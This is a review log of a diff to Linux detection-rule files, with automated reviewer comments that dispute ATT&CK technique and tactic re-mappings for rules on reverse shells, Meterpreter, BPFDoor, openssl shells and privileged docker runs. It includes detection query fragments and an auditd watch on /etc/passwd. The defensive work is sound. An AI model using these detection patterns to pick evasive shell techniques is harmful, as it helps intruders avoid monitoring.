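Review bot: Removing the T1059.004 Unix Shell sub-technique from `execution_perl_tty_shell.toml` while keeping the T1059 parent loses precision rather than fixing anything: a Perl TTY shell presumably ends in an interactive Unix shell, which is what the sub-technique covers, and ATT&CK has no Perl-specific sub-technique to replace it with. Unless the query (outside the hunk) no longer matches a spawned shell, keep the `[[rule.threat.technique.subtechnique]]` block with `id = "T1059.004"`. The enclosing `[[rule.threat]]` starts before the hunk.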
@@ -117,86 +128,8 @@ process.name in~ ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.002" -name = "Password Cracking" -reference = "https://attack.mitre.org/techniques/T1110/002/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" - -[[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.002" -name = 
"Vulnerability Scanning" -reference = "https://attack.mitre.org/techniques/T1595/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/execution_potentially_overly_permissive_container_creation.toml b/rules/linux/execution_potentially_overly_permissive_container_creation.toml index 2fcd60481d8..69ded33a6ec 100644 --- a/rules/linux/execution_potentially_overly_permissive_container_creation.toml +++ b/rules/linux/execution_potentially_overly_permissive_container_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -85,7 +85,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -97,6 +107,16 @@ process.name:docker and process.args:(run and --privileged) [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" @@ -119,6 +139,7 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml index 535e1497a84..b89fc96dc27 100644 --- a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml +++ b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
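Review bot: Adding T1059/T1059.004 Unix Shell to the threat entry for `process.name:docker and process.args:(run and --privileged)` asserts a shell interpreter for what is a docker CLI invocation; the T1609 Container Administration Command already in the same entry is the technique that describes it. Unless the new_terms field `process.parent.executable` is meant to capture the shell that launched docker, drop the two added technique blocks. The second hunk only inserts a blank line before `[rule.new_terms]`, which matches the other new_terms rule in this change.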
@@ -94,7 +94,18 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
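Review bot: The new `tags` list carries `"Tactic: Persistence"`, but the threat mapping on the new side (the `@@ -109,37 +120,28 @@` hunk that follows) maps only TA0002 Execution and TA0005 Defense Evasion, so Persistence is an orphan tag and Defense Evasion has no tag at all. Replace the line with `"Tactic: Defense Evasion",` (or add a Persistence threat entry if one was intended); a tag whose tactic is absent from `rule.threat` skews ATT&CK coverage reporting in both directions.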
@@ -109,37 +120,28 @@ not process.parent.name:(sshd or make or su or ds_agent or fortitraylauncher or framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.009" -name = "Break Process Trees" -reference = "https://attack.mitre.org/techniques/T1036/009/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index 121dd0f3510..9188badd565 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] 
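Review bot: The Defense Evasion entry now maps the generic T1564 Hide Artifacts where the old side had T1036.009 Break Process Trees, which is the sub-technique that specifically describes a process being backgrounded and re-parented to detach from its parent — the behaviour this rule keys on, judging by the `process.parent.name` exclusions in the hunk context. If the intent was only to drop T1036 as the parent technique, a sub-technique-level mapping is still preferable to a parent-only one. The Execution entry also lists T1059 without the T1059.004 Unix Shell sub-technique that the old side carried and that the sibling Linux shell rules in this change add, which looks inconsistent.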
@@ -65,7 +65,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -77,18 +88,14 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1036.008" -name = "Masquerade File Type" -reference = "https://attack.mitre.org/techniques/T1036/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml index 856d4737fb0..1f0801f42f1 100644 --- a/rules/linux/execution_process_started_in_shared_memory_directory.toml +++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml 
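Review bot: The rewritten first threat entry removes the blank line between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]` and adds a trailing blank line at end of file (the lone `+` after the TA0002 reference), which departs from the one-blank-line-between-tables layout every other rule in this chunk uses and is likely to be undone by the next formatting pass. More substantively, the removed T1036.008 Masquerade File Type mapping described what this rule detects (a process started from a path posing as a PID file, per the file name); if Execution is being added, keeping a second `[[rule.threat]]` block for Defense Evasion — as execution_shell_openssl_client_or_server keeps two tactics — preserves that coverage instead of replacing it.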
@@ -2,7 +2,7 @@ creation_date = "2022/05/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -56,7 +56,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,22 +120,9 @@ Shared memory directories in Linux, such as /dev/shm and /run/shm, are designed framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index 739358a6ff2..c8eff177979 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml 
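Review bot: The new mapping leaves execution_process_started_in_shared_memory_directory with a single Execution entry (T1059), so the Hide Artifacts / Defense Evasion mapping that explains why execution from /dev/shm or /run/shm is suspicious (the description context in the hunk says as much) disappears from ATT&CK coverage. Tags and threat are at least consistent here, but if the goal was to add Execution, keeping the TA0005 entry alongside it — two `[[rule.threat]]` blocks, as execution_shell_openssl_client_or_server does — would not lose the evasion signal.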
@@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -117,11 +117,6 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" diff --git a/rules/linux/execution_python_webserver_spawned.toml b/rules/linux/execution_python_webserver_spawned.toml index 6306061e099..5f6a9442737 100644 --- a/rules/linux/execution_python_webserver_spawned.toml +++ b/rules/linux/execution_python_webserver_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -126,3 +126,16 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml index 60af7276a56..a1fd996d20e 100644 --- a/rules/linux/execution_shell_evasion_linux_binary.toml +++ b/rules/linux/execution_shell_evasion_linux_binary.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] 
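Review bot: The execution_python_webserver_spawned hunk adds a TA0008 Lateral Movement threat entry but no matching `tags` change appears in this diff, so unless the file already carries it the tag/tactic set drifts the same way as the files noted earlier; add `"Tactic: Lateral Movement",` to its `tags`. In the execution_python_tty_shell hunk, removing T1059.004 Unix Shell from a rule whose subject is Python spawning an interactive TTY shell leaves only T1059.006, although the shell is what ends up executing; the sub-technique seems worth keeping — confirm against the query, which is outside the hunk.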
@@ -126,7 +126,15 @@ Session View uses process data collected by the Elastic Defend integration, but For more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -186,31 +194,19 @@ process where host.os.type == "linux" and event.type == "start" and process.exec [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml index 59e7bcf2dd8..b57a9c5ebbe 100644 --- a/rules/linux/execution_shell_openssl_client_or_server.toml +++ b/rules/linux/execution_shell_openssl_client_or_server.toml 
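Review bot: The `@@ -186,31 +194,19 @@` hunk adds two consecutive blank lines before `[rule.threat.tactic]` and a trailing blank line at end of file while deleting the blank that separated `framework` from the first technique; one blank line between tables is the layout the rest of this chunk uses. More substantively, a rule named execution_shell_evasion_linux_binary ends up with no Defense Evasion mapping at all — the T1202 Indirect Command Execution entry is removed and the `"Tactic: Defense Evasion"` tag with it — which is hard to reconcile with the rule's purpose; if only the Execution entry was meant to be reshaped, keep the TA0005 block as a second `[[rule.threat]]`.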
@@ -2,7 +2,7 @@ creation_date = "2024/07/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -105,14 +114,27 @@ not process.parent.executable in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1573" -name = "Encrypted Channel" -reference = "https://attack.mitre.org/techniques/T1573/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1573.002" -name = "Asymmetric Cryptography" -reference = "https://attack.mitre.org/techniques/T1573/002/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" 
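Review bot: The Command and Control entry swaps T1573 Encrypted Channel (with T1573.002) for T1071 Application Layer Protocol, yet this rule detects a shell spawned via openssl in client or server mode — a TLS tunnel, which is what T1573 describes, while T1071 implies HTTP/DNS-style protocol use. Unless the query (outside this hunk) changed to match something beyond a raw TLS socket, T1573 is the closer mapping. Note also that the tags hunk above removes `"Tactic: Command and Control"` while `id = "TA0011"` survives as trailing context here, so the tactic is now untagged.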
diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml index 4565044ed1e..71f6934441f 100644 --- a/rules/linux/execution_shell_via_background_process.toml +++ b/rules/linux/execution_shell_via_background_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/20" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -83,7 +83,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -96,19 +106,6 @@ process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
@@ -123,3 +120,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml index 70bad06fdd8..b1d6944dd41 100644 --- a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml +++ b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -84,7 +84,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=5s 
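Review bot: The added C2 entry maps T1071 Application Layer Protocol, replacing the T1095 Non-Application Layer Protocol entry removed in the previous hunk, but this rule — and the child_tcp, tcp_cli, udp_cli, lolbin, suspicious_binary, meterpreter and java_revshell siblings that receive the same T1071 block later in this chunk — detects shells over raw TCP/UDP sockets (shell redirections and socket utilities, per the `process.parent.name in ("bash", "dash", ...)` context), which is the non-application-layer case T1095 exists for. If the transport is not an application protocol, keep T1095; if both are plausible, list both techniques under TA0011 rather than replacing one with the other.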
@@ -101,19 +108,6 @@ sequence by host.id, process.entity_id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -128,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_java_revshell_linux.toml b/rules/linux/execution_shell_via_java_revshell_linux.toml index 45f7f7ec55b..ca489d0cc11 100644 --- a/rules/linux/execution_shell_via_java_revshell_linux.toml +++ b/rules/linux/execution_shell_via_java_revshell_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -139,3 +139,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" 
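Review bot: The execution_shell_via_java_revshell_linux hunk adds a TA0011 Command and Control entry with no `tags` change visible in this diff, so unless the file already lists it the rule has the tag/tactic gap noted earlier for its siblings; add `"Tactic: Command and Control",` to its `tags` in the same change.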
diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml index 434c19d770b..26b891475de 100644 --- a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml +++ b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1s @@ -114,19 +121,6 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
@@ -137,17 +131,20 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.011" -name = "Lua" -reference = "https://attack.mitre.org/techniques/T1059/011/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml index 3bdb54b7611..8e75039764d 100644 --- a/rules/linux/execution_shell_via_meterpreter_linux.toml +++ b/rules/linux/execution_shell_via_meterpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -61,7 +61,14 @@ However, if more advanced configuration is required to detect specific behavior, -w /etc/passwd -p wa -k passwd """ severity = "high" -tags = ["Tactic: Discovery", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
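Review bot: Dropping the T1059.006 Python and T1059.011 Lua sub-techniques from execution_shell_via_lolbin_interpreter_linux narrows the mapping to Unix Shell only, although the rule's subject is shells spawned through scripting interpreters (inferred from the name; the query is outside the hunk). If Python or Lua parents are still matched by the sequence, the removed sub-techniques should stay alongside T1059.004.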
